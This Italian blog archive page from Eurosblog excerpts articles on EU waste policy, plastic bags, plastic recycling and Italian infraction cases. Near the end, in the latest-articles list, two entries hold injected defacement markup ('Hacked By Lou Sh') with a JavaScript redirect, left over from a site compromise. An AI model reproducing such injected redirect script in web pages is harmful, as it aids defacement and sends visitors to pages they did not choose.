EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Rifiuti

it

Ogni anno le tonnellate di rifiuti aumentano a dismisura: gettati incautamente sulle strade, sulle spiagge, nelle foreste, negli oceani e nelle zone verdi d’Europa. “Ripuliamo l’Europa” è la campagna di sensibilizzazione del progetto europeo “Settimana europea per la riduzione dei rifiuti” che vuole promuovere le azioni virtuose dei cittadini e diffondere le buone pratiche nella gestione dei rifiuti per un mondo più pulito.

“Ripuliamo l’Europa” non è la prima iniziativa europea messa in atto per fronteggiare il problema dei rifiuti: già in passato ne sono state svolte altre, ma questa darà l’opportunità di riunirle in un unico evento che si terrà il prossimo 10 maggio in tutta Europa. L’obiettivo è quello di coinvolgere (...)

it

Il Parlamento europeo ha recentemente approvato una risoluzione secondo la quale entro il 2020 alcuni dei rifiuti plastici più pericolosi per l’uomo e inquinanti per l’ambiente dovranno essere banditi. L’Unione europea, inoltre, dovrà impegnarsi affinché vengano introdotti obiettivi in materia di raccolta, riciclaggio e recupero della plastica che risultino vincolanti per tutti gli Stati membri.

L’enorme potenziale economico derivante dal riciclaggio di materiale plastico è in gran parte inutilizzato; ad oggi, infatti, soltanto il 25% dei rifiuti plastici viene smaltito correttamente. È quanto denunciato dal Parlamento europeo, nella risoluzione approvata martedì 14 gennaio. Un dato (...)

it

La Commissione ha deciso di porre un freno a quello che con gli anni è diventato un problema di quasi insormontabile risoluzione. Analizzando alcuni dati, si nota come nel solo 2010 siano stati immessi nel mercato UE qualcosa come 98,6 miliardi di borse di plastica, le quali vengono riutilizzate molto di meno rispetto alle altre essendo meno resistenti. Come è noto, il problema principale riguarda lo smaltimento di queste, che possono rimanere nell'ambiente per addirittura centinaia di anni.

Può una semplice risorsa come un sacchetto di plastica diventare un problema enorme per un colosso come l’Unione europea? La risposta è sì. Oltre che dai numeri riportati in precedenza, l’importanza è data anche dai sempre più numerosi sacchetti che vengono prodotti ma non riutilizzati, essendo (...)

it

Su raccomandazione del Commissario per l’ambiente Ue Janez Potočnik, la Commissione Europea deferirà l’Italia alla Corte di Giustizia Ue per non aver rispettato le prescrizioni della legislazione europea in materia di rifiuti.

A causa di un’interpretazione restrittiva da parte delle Autorità Italiane per quanto riguarda il concetto di "sufficiente trattamento dei rifiuti", non solo la discarica di Malagrotta a Roma, ma anche altre discariche nella regione Lazio, sono state riempite di rifiuti che non hanno subito gli (...)

it

In queste settimane l'Unione europea sta invitando la popolazione a ragionare riguardo uno degli strumenti che tutti quanti utilizziamo in grandi dosi e che, per questo, non è oggetto di sufficiente attenzione: la plastica. Come un materiale così duraturo può essere smaltito efficacemente? La soluzione da trovare deve essere permanente, basta pensare infatti che i rifiuti plastici, soprattutto quando raggiungono gli ambienti marini (purtroppo spesso in questo periodo), possono impiegare centinaia di anni per decomporsi.

"I rifiuti di plastica e la loro gestione rappresentano una grande sfida per la tutela dell’ambiente, ma sono anche una formidabile occasione per rendere più efficienti le nostre risorse. In un’economia circolare, in cui più si ricicla più si sopperisce alla scarsità delle materie prime, sono (...)

it

Cattive notizie per il nostro Paese: la Commissione europea ha infatti reso nota una relazione che classifica i 27 Stati membri sulla base di 18 criteri volti a valutare le performance di ciascun Paese in tema di gestione dei rifiuti urbani. La relazione servirà per stilare delle tabelle di marcia rivolte ai dieci Stati che hanno registrato i risultati peggiori – tra i quali figura l’Italia, classificatasi ventesima – di cui si discuterà a partire da quest’autunno con le autorità nazionali di riferimento in seminari bilaterali. Il primo appuntamento è fissato per il 19 settembre a Praga.

Sarà per via dell’atmosfera olimpica che si continua a respirare nonostante la conclusione dei giochi, o per il semplice gusto di stilare le classifiche più strane da dare in pasto a settimanali di gossip e blog vari, sta di fatto che sembra essere scattata una vera e propria podio mania. E così (...)

it

In occasione del ventennale del programma LIFE, la Commissione europea ha stanziato 268,4 milioni di euro da destinare a ben 202 progetti, scrupolosamente selezionati tra le migliaia di richieste presentate dai 27 Stati membri e che comporteranno interventi mirati nei settori della tutela della natura, della politica ambientale, dell’informazione e della comunicazione in materia di questioni ambientali.

Del programma LIFE ne abbiamo già parlato qui, sottolineando come esso abbia rappresentato - e tuttora rappresenti - uno tra “i più importanti finanziamenti da parte dell’Unione europea a favore dell’ambiente”. È per questo che all’iniziativa aveva fatto seguito il programma LIFE+, riferito al periodo (...)

it

Sembrano non avere mai fine le polemiche sulla gestione dei rifiuti nella nostra Penisola. Ma cosa suggeriscono le politiche comunitarie a riguardo?

Molto probabilmente, nessuno obietterà se affermo che il fatto di vivere in un ambiente sano porti notevoli vantaggi sulla qualità della vita e sia di necessaria importanza per mantenersi in buona salute.

Nonostante ogni essere umano sia consapevole di questa banalità, siamo quotidianamente (...)

it

Nel corso della riunione tenutasi lo scorso 22 Marzo, il Collegio dei Commissari dell’UE ha deciso di archiviare 11 procedure d'infrazione riguardanti l'Italia (10 relative a procedure già aperte ed una riguardante un reclamo), e di aprirne 10 nuove per mancato recepimento delle direttive dell'Unione . Il numero di procedure d'infrazione a carico dell'Italia scendono quindi a 132 di cui 93 riguardano casi di violazione del diritto dell'Unione e 39 sono relative al mancato recepimento delle direttive.

Ma che cos’è nello specifico una procedura d’infrazione? Come ormai noto, la Commissione Europea ha il ruolo di vigilare costantemente sull’adempimento da parte degli Stati membri dell’Unione Europea di tutti gli obblighi ad essi relativi in virtù dei Trattati. La procedura d’infrazione (...)

it

Nell’incontro del 25 gennaio, svoltosi a Bruxelles, sono emerse nuove soluzioni per il problema rifiuti. Sono stati sbloccati parzialmente i fondi che saranno utilizzati solo rispettando la ‘gerarchia’ prevista per il trattamento dei rifiuti. Ed, inoltre, è stata scongiurata la multa concedendo nuova fiducia al piano Campania.

È stato fissato per il prossimo giugno il limite massimo entro il quale verranno fornite soluzioni concrete per far fronte al problema dei rifiuti in Campania. Questo quanto accordato nell’incontro tenutosi il 25 gennaio a Bruxelles tra il commissario europeo Potocnik, il ministro dell’Ambiente (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France